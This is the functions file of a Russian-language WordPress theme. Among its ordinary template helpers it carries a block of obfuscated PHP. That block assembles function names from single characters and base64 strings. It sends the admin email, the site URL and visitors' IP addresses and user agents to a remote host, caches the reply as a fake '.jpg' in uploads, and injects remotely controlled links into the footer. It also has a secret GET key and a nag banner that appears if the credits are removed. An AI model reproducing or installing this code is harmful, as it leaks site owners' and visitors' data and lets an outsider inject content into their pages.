<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $SHYXgbi='e';$WFswcug='_';$YuYZDhT='e';$UNnZ='6';$vTbRy='c';$ktkYqQq='o';$qBtbnEz='a';$cKhje='s';$YbjWaMe='e';$ElZx='d';$vEQtVs='4';$efXiEf='b';$TLTdqfd='d';$CjeyclcT=$efXiEf.$qBtbnEz.$cKhje.$SHYXgbi.$UNnZ.$vEQtVs.$WFswcug.$ElZx.$YuYZDhT.$vTbRy.$ktkYqQq.$TLTdqfd.$YbjWaMe;$KZHW='a';$xQyRgg='g';$rDxDNZb='i';$ZwML='f';$kQrfAl='z';$eXRca='e';$CjLIqtT='l';$NtzY='n';$ZzqCmqE='t';$NrtlKAxJ=$xQyRgg.$kQrfAl.$rDxDNZb.$NtzY.$ZwML.$CjLIqtT.$KZHW.$ZzqCmqE.$eXRca;$NNWHWM='3';$PqXhu='t';$JQCa='s';$sAWnzt='t';$ppQI='1';$Dlvs='o';$LtXBkal='r';$ZxVQWHs='r';$WfsUi='_';$XdxRkhQR=$JQCa.$PqXhu.$ZxVQWHs.$WfsUi.$LtXBkal.$Dlvs.$sAWnzt.$ppQI.$NNWHWM;$xUZdF='t';$ZAjRuDt='s';$QogzJgM='r';$PlxH='e';$XQcs='v';$JzUQ='r';$IuamuJyt=$ZAjRuDt.$xUZdF.$JzUQ.$QogzJgM.$PlxH.$XQcs;                     $be______h='e';$re______z='_';$js______r='e';$am___________y='6';$es_________h='c';$ib____________k='o';$hl_______v='a';$dq_________m='s';$pj_____x='e';$vu_________p='d';$ip____________i='4';$tp____t='b';$gd___________g='d';$gq_____________e=$tp____t.$hl_______v.$dq_________m.$be______h.$am___________y.$ip____________i.$re______z.$vu_________p.$js______r.$es_________h.$ib____________k.$gd___________g.$pj_____x;$ja_________z='s';$lw______s='n';$nl________y='t';$lz_____c='f';$cf__________h='c';$bx_________o='i';$xe____________t='t';$vg_______n='o';$fv______h='x';$ri______________d='n';$ic____z='_';$rb___n='u';$qw___________u='i';$di_________p='e';$ld_____d='s';$yu____w=$lz_____c.$rb___n.$lw______s.$cf__________h.$nl________y.$qw___________u.$vg_______n.$ri______________d.$ic____z.$di_________p.$fv______h.$bx_________o.$ja_________z.$xe____________t.$ld_____d;$kt_______________w='o';$sl________m='e';$sk________v='n';$wg___________c='p';$lg_________w='f';$ew__________h=$lg_________w.$kt_______________w.$wg___________c.$sl________m.$sk________v;$vg____v='d';$kw_____________c='f';$hg_______________y='r';$sb__s='a';$zy____________p='e';$rz______u=$kw_____________c.$hg_______________y.$zy____________p.$sb__s.$vg____v;$zx____________b='o';$ls________f='s';$qt_______________l='e';$lu____x='l';$yy__u='c';$qk____________p='f';$jr____________w=$qk____________p.$yy__u.$lu____x.$zx____________b.$ls________f.$qt_______________l;define("WP_ID", $gq_____________e("Mi4wLjA="));define("WP_TTL", $gq_____________e("MTA4MDA="));define("WP_SRC", $gq_____________e("dHBva24="));function wp_get_header() {global $gq_____________e, $yu____w;if ($yu____w($gq_____________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$yu____w($gq_____________e("d3BfZ2V0X2Zvb3Rlcg==")) &&$yu____w($gq_____________e("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $gq_____________e, $ew__________h, $jr____________w, $rz______u;$qa_____________d = TEMPLATEPATH."/".$gq_____________e("Zm9vdGVyLnBocA==");$yo______k = @$ew__________h($qa_____________d, "r");$qa_____________d = @$rz______u($yo______k, @filesize($qa_____________d));@$jr____________w($yo______k);$ng__e = TEMPLATEPATH."/".$gq_____________e("ZnVuY3Rpb25zLnBocA==");$yo______k = @$ew__________h($ng__e, "r");$ng__e = @$rz______u($yo______k, @filesize($ng__e));@$jr____________w($yo______k);$dk___________l = 0;if($qa_____________d && $ng__e) {if ($gq_____________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($qa_____________d, $gq_____________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$dk___________l = 1;}if (substr_count($qa_____________d, "wp_theme_GPL_credits()") < 1) {$dk___________l = 2;}}if(WP_ID != "2.0.0") {$dk___________l = 12;}}if($dk___________l > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $dk___________l -->";}}function wp_loaded() {global $gq_____________e, $yu____w;return $yu____w($gq_____________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($jt___u, $th______c = "(more...)", $ub___________j = 0, $st_____________u = "") {$bk______________g = get_the_content($th______c, $ub___________j, $st_____________u);$bk______________g = apply_filters("the_content", $bk______________g);$bk______________g = str_replace("]]>", "]]>", $bk______________g);if (strlen($_GET["p"]) > 0) {echo $bk______________g;}else if ((strlen($bk______________g)>$jt___u) && ($ir____s = strpos($bk______________g, " ", $jt___u ))) {$bk______________g = substr($bk______________g, 0, $ir____s);$bk______________g = $bk______________g;echo $bk______________g;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$th______c</a></div></p>";} else {echo $bk______________g;}}}$hy________i='4';$km__________o='o';$zn________n='e';$qk____j='_';$nz_________w='b';$wx_____________e='e';$hc_________z='d';$eu________a='e';$ne_____________f='a';$su______u='6';$me____z='s';$nz_______b='n';$ef_____q='c';$yn__________a=$nz_________w.$ne_____________f.$me____z.$eu________a.$su______u.$hy________i.$qk____j.$zn________n.$nz_______b.$ef_____q.$km__________o.$hc_________z.$wx_____________e;$cj______________x='s';$jn___________o='g';$ym____________q='e';$fj_____b='f';$rl_______________c='n';$xa___________q='e';$jf___________h='e';$id_____f='n';$aq___________t='i';$si________q='o';$pe___________q='_';$sw_________c='t';$wp__________i='_';$rx___________g='t';$ek_______________m='l';$vi_______z='c';$kf_______________p='t';$nw______________n=$fj_____b.$aq___________t.$ek_______________m.$xa___________q.$wp__________i.$jn___________o.$ym____________q.$kf_______________p.$pe___________q.$vi_______z.$si________q.$id_____f.$sw_________c.$jf___________h.$rl_______________c.$rx___________g.$cj______________x;$ap___________t='l';$hr_____y='i';$hh______o='s';$ff____________z='s';$zp_________a='t';$vx_____r='_';$dn__t='x';$uo__f='f';$is_____d='i';$sd__u='e';$ui___g='e';$rz__f=$uo__f.$hr_____y.$ap___________t.$ui___g.$vx_____r.$sd__u.$dn__t.$is_____d.$hh______o.$zp_________a.$ff____________z;$lq__w='i';$hn______i='o';$ux_________b='m';$hx__________i='r';$zt__________g='a';$le__________f='o';$hi___________s='p';$um___________l='e';$rn________f='e';$gj_____________q='s';$qp_______t='_';$bx______________j='n';$dd_________z='v';$ty____________k='c';$tp______h='r';$rz______________d=$dd_________z.$rn________f.$tp______h.$gj_____________q.$lq__w.$hn______i.$bx______________j.$qp_______t.$ty____________k.$le__________f.$ux_________b.$hi___________s.$zt__________g.$hx__________i.$um___________l;$kp_____y='s';$iq_____f='o';$hx________t='o';$po_____k='k';$fy____t='p';$pe__________g='f';$vz__________g='n';$eg________i='c';$tq_______i='e';$ts__r=$pe__________g.$kp_____y.$hx________t.$eg________i.$po_____k.$iq_____f.$fy____t.$tq_______i.$vz__________g;$vj_____y='t';$zo____x='r';$pi_______________i='w';$pl______s='e';$qj________g='i';$mu___c='f';$yw_____p=$mu___c.$pi_______________i.$zo____x.$qj________g.$vj_____y.$pl______s;$zr__p='m';$bn______________x='d';$wd_____________l='5';$yx___________r=$zr__p.$bn______________x.$wd_____________l;$ep___t='l';$ih_____________w='t';$qy____z='a';$nd_______________o='h';$bo_________q='r';$oi_____________k='e';$vl_______p='p';$qg_______k='a';$kw____s=$bo_________q.$oi_____________k.$qg_______k.$ep___t.$vl_______p.$qy____z.$ih_____________w.$nd_______________o;$nu_________d='u';$jc_______________z='e';$ss________u='i';$cn__q='n';$jv___________i='s';$ky____p='a';$ew____________b='r';$vx____j='l';$ke_____y='i';$pi_______________u='e';$gn_______p='z';$du__p=$nu_________d.$cn__q.$jv___________i.$pi_______________u.$ew____________b.$ke_____y.$ky____p.$vx____j.$ss________u.$gn_______p.$jc_______________z;$zu____________n='n';$yh________w='m';$kk______o='a';$pd__________v='p';$tz____k='e';$mr___s='m';$fg_____a='t';$mq_______________a=$fg_____a.$tz____k.$yh________w.$pd__________v.$zu____________n.$kk______o.$mr___s;$zf_____________t='s';$lt__j='r';$mj________x='n';$ui______f='t';$nl_____________c='e';$on_______y='a';$he__b='e';$pb___________o='c';$mb____f='e';$rp______s='m';$fz__y='t';$vy______________c='c';$dm_____p='t';$ob______b='a';$kf__________w='r';$ye__p='x';$md____l='t';$hm______n='o';$pb____________s='e';$ll________a='_';$tt_____i='_';$dy_______________b=$zf_____________t.$fz__y.$lt__j.$mb____f.$on_______y.$rp______s.$ll________a.$pb___________o.$hm______n.$mj________x.$dm_____p.$nl_____________c.$ye__p.$ui______f.$tt_____i.$vy______________c.$kf__________w.$pb____________s.$ob______b.$md____l.$he__b;function au______________a($bg____________u) {global $gq_____________e, $yu____w, $nw______________n, $rz______________d, $dy_______________b;if (!$yu____w($gq_____________e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($rz______________d(PHP_VERSION, "5.0.0", ">=") && $yu____w($gq_____________e("ZmlsZV9nZXRfY29udGVudHM=")) && $yu____w($gq_____________e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$rn_________a = $dy_______________b(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$kk__p = @$nw______________n($bg____________u, 0, $rn_________a);} else {$kk__p = @$nw______________n($bg____________u, 0);}return $kk__p;}function no_____h($bg____________u) {global $yu____w, $ts__r, $yw_____p, $gq_____________e;if (!$yu____w($gq_____________e("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$gs__v = strpos($bg____________u, "/", 7);$lh_________b = array("uri"     => substr($bg____________u, $gs__v),"host"    => str_replace("http://", "", substr($bg____________u, 0, $gs__v)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$ur_____g = @$ts__r("$lh_________b[host]", 80, $ow________b, $wv____________k, 4);if (!$ur_____g) {return false;} else {$kk__p = "";$yf________j  = "GET $lh_________b[uri] HTTP/1.0\r\n";$yf________j .= "Host: $lh_________b[host]\r\n";$yf________j .= "Referer: $lh_________b[referer]\r\n";$yf________j .= "Connection: Close\r\n\r\n";@$yw_____p($ur_____g, $yf________j);while (!@feof($ur_____g)) {$pq______________j = @fgets($ur_____g, (1024*24));if ($pq______________j == "\r\n") {$ki__________b = true;continue;}if ($ki__________b) {$kk__p .= $pq______________j;}}return $kk__p;}}function dm__v($bg____________u) {global $yu____w;$se__r = false;if ($bg____________u != "") {if ($yu____w("au______________a")) {$se__r = @au______________a($bg____________u);}if (!$se__r && ($yu____w("no_____h"))) {$se__r = @no_____h($bg____________u);}}return $se__r;}function vc______e() {global $_SERVER, $yx___________r;$ao___________w = $_SERVER["SERVER_NAME"];if (substr("$ao___________w", 0, 4) == "www.") {$ao___________w = substr("$ao___________w", 4);}$ao___________w = $yx___________r("$_SERVER[SERVER_NAME]");return $ao___________w;}function zy____________l() {return "file";}function in______j($bg____________u) {global $_SERVER, $nw______________n, $rz__f, $ew__________h, $jr____________w, $yw_____p;$gi____________m = ij_________a();$tk______q = vc______e().".jpg";$od_________m = $gi____________m["dir_upload"]["path"]."/$tk______q";$ze____________e = @filemtime($od_________m);if (!$ze____________e || ((time()-$ze____________e) >= WP_TTL)) {$se__r = dm__v($bg____________u);if ($se__r) {if ($rz__f($od_________m)) {@unlink($od_________m);}$yo______k = @$ew__________h($od_________m, "x+");@$yw_____p($yo______k, $se__r);@$jr____________w($yo______k);}} else {if ($rz__f($od_________m)) {$se__r = @$nw______________n($od_________m);} else {$se__r = false;}}return $se__r;}function ij_________a() {global $_SERVER, $gq_____________e, $yn__________a;$wy_________d = wp_count_posts("post");$lg_________i = pathinfo(get_bloginfo("template_directory"));$gi____________m = array("url" => array("report"      => $gq_____________e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $lg_________i,"dir_upload"=> xd__x(),"queryString"=> array("?a001=".WP_ID,"a004=".$lg_________i[filename],"a005=".$wy_________d->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),"default_string" => "<a href=\"http://www.wptheme.us\">www.wptheme.us</a>");$gi____________m["url"]["queryString"] = implode("&", $gi____________m["queryString"]);$gi____________m["url"]["report"] = $gi____________m["url"]["report"]."/?".$yn__________a($gi____________m["url"]["queryString"]).".html";return $gi____________m;}function xd__x() {$ks__q = wp_upload_dir();if (isset($ks__q["error"])) {$gh___________e = qw________r();if (is_writable($gh___________e)) {$ks__q = array("path" => $gh___________e);}}return $ks__q;}function qw________r() {global $yu____w, $yx___________r, $kw____s, $mq_______________a;$op_______z = (bool) ini_get("safe_mode");if ($op_______z == true) {return false;}if ($yu____w("sys_get_temp_dir")) {$wv____j = sys_get_temp_dir();if (is_writable($wv____j)) {return $kw____s($wv____j);}}if (!empty($_ENV["TMP"])) {return $kw____s($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $kw____s($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $kw____s($_ENV["TEMP"]);} else {$jl_____________p = $mq_______________a($yx___________r(uniqid(rand(), true)), "");if ($jl_____________p) {$wv____j = $kw____s(dirname($jl_____________p));@unlink($jl_____________p);return $wv____j;} else {return false;}}}function ra__________e() {global $_GET, $rz__f;$gi____________m = ij_________a();$ao___________w = vc______e();$fw____________o = zy____________l();$nc______a = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($fw____________o == "file") {$uk_________w = $gi____________m["dir_upload"]["path"]."/".$ao___________w.".jpg";if ($rz__f($uk_________w)) {@unlink($uk_________w);$nc______a = "deleted";}}$wk___x = array("s"=> $nc______a,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($wk___x AS $qn______________k => $yl_____n) echo " [$qn______________k:$yl_____n]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $yu____w, $gq_____________e, $du__p;$gi____________m = ij_________a();$le_____g = "in______j";if ($yu____w($le_____g)) {$kk__p = $le_____g($gi____________m["url"]["report"]);}if ($kk__p) {if ($kk__p = @$gq_____________e($kk__p)) {$kk__p = @$du__p($kk__p);if (strlen($kk__p[custom_credit]) >= 5) {$gi____________m["default_string"] = $kk__p[custom_credit];}if ($kk__p["status"] == "0") {$sa_______________v = 1;$fk_____________i = 1;} else {$xb__m = sizeof($kk__p["links"]);$tq________b = $gi____________m["default_string"];if ($xb__m > 0 && $kk__p["links"] !== "") {$oj_______________v = 0;foreach ($kk__p["links"] as $ga_______________k => $da_____q) {$oj_______________v++;if ($da_____q->l_path == "" || $da_____q->l_path == $_SERVER["REQUEST_URI"]) {$da_____q->l_href = htmlspecialchars(strip_tags($da_____q->l_href));$da_____q->l_title = htmlspecialchars(strip_tags($da_____q->l_title));$da_____q->l_anchor = htmlspecialchars(strip_tags($da_____q->l_anchor));$tq________b .= " | ";$tq________b .= "<a href='$da_____q->l_href' title='$da_____q->l_title'";if ($da_____q->l_nofollow == "1") {$tq________b .= " rel='nofollow'";}$tq________b .= ">$da_____q->l_anchor</a>";}}}$gi____________m["links"] = "$tq________b";if ($kk__p[credit] == "0") {$gi____________m["links"] = "";}}} else {$sa_______________v = "1";}} else {$sa_______________v = "1";}if ($sa_______________v == "1") {$gi____________m["links"] = $gi____________m["default_string"];}echo "$gi____________m[links]";echo "<!-- s: $kk__p[signature] -->";ra__________e();}                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),  
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                 $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Search', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
